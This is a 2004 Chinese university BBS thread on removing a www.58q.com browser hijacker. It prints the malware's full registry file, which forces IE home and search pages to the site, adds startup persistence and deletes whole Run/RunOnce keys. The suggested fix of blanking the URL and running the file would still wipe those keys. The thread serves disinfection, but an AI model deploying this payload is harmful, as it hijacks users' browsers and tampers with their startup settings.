Virus 版 (精华区)

发信人: SwordLea (飞刀李), 信区: Virus
标  题: WINSYS.cer终极解决方案
发信站: 哈工大紫丁香 (Fri Jun 25 17:25:34 2004), 站内

可以直接修改这个文件，用记事本把www.58q.com改为空，再执行之。

【 以下文字转载自 Hacker 讨论区 】
发信人: SwordLea (飞刀李), 信区: Hacker
标  题: Re: 求助！我的机器被www.58q.com的恶意代码修改了
发信站: 哈工大紫丁香 (2003年12月24日15:08:01 星期三), 站内信件

日前我也中过它，手工清除吧，很容易的。
用ue或者notepad打开C:\$NtUninstallQ5588565$\WINSYS.cer，对照里面的
注册表位置进行修改吧。
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
"SearchURL"="http://www.58q.com"

[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer]
"SearchURL"="http://www.58q.com"

[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main]
"Search Page"="http://www.58q.com"
"Default_Search_URL"="http://www.58q.com"
"Search Bar"="http://www.58q.com"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.58q.com"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.58q.com"

[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://www.58q.com"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.58q.com"
"First Home Page"="http://www.58q.com"
"Default_Search_URL"="http://www.58q.com"
"Search Page"="http://www.58q.com"
"Search Bar"="http://www.58q.com"
"Local Page"="http://www.58q.com"

[-HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run]
[HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run]
@="regedit -s C:\\$NtUninstallQ8877565$\\WINSYS.cer"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL"="http://www.58q.com"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Default_Search_URL"="http://www.58q.com"
"Search Page"="http://www.58q.com"
"Search Bar"="http://www.58q.com"
"SearchURL"="http://www.58q.com"
"Start Page"="http://www.58q.com"
"First Home Page"="http://www.58q.com"
"Default_Page_URL"="http://www.58q.com"
"Local Page"="http://www.58q.com"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Sys32"="C:\\$NtUninstallQ5588565$\\WINSYS.vbs"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sys32"="regedit -s C:\\$NtUninstallQ5588565$\\WINSYS.cer"
"internat.exe"="internat.exe"
"zwupdows"=-
"win"=-
"mwin"=-
"intenet"=-
"Inernet"=-
"Internet"=-
"iexpleror"=-
"zxdows"=-
"qwe"=-
"win1"=-
"winwin"=-
"9i5zxdows"=-
"9i5com01zxdows"=-
"99zxdows"=-
"syste"=-
"intelnat.exe"=-
"88zxdows"=-
"Start Pagewin"=-
"Start Page"=-
"9i5comzxdows"=-
"9q5zxdows"=-
"999izxdows"=-
"033zxdows"=-
"8zxdows"=-
"flash"=-
"3zxdows"=-
"interneet.exe"=-
"u88y"=-
"88u88"=-
"u18"=-
"u1881"=-
"u1882"=-
"u1883"=-
"u1884"=-
"u1885"=-
"u1886"=-
"u1887"=-
"u1888"=-
"system"=-
"u188"=-
"iexpler"=-
"u1810"=-
"WIN32"=-
"WlN32"=-

【 在 broker (齐天大圣) 的大作中提到: 】
: 
: 我的机器被www.58q.com的恶意代码修改了，一进IE，默认主页就成它了。改了注册表，用
: 了上网助手，都不好使。请问各位高人，怎么才能出去。谢谢了！


--
    如果程序员来到了程序设计版，
    那么他就不会再牛，
    更不会随便给予了。  

※ 修改:·SwordLea 于 Jun 25 17:29:33 修改本文·[FROM: 218.247.215.251]
※ 来源:·哈工大紫丁香 bbs.hit.edu.cn·[FROM: 202.118.246.231]
※ 修改:·SwordLea 於 12月24日15:09:35 修改本文·[FROM: 202.118.246.231]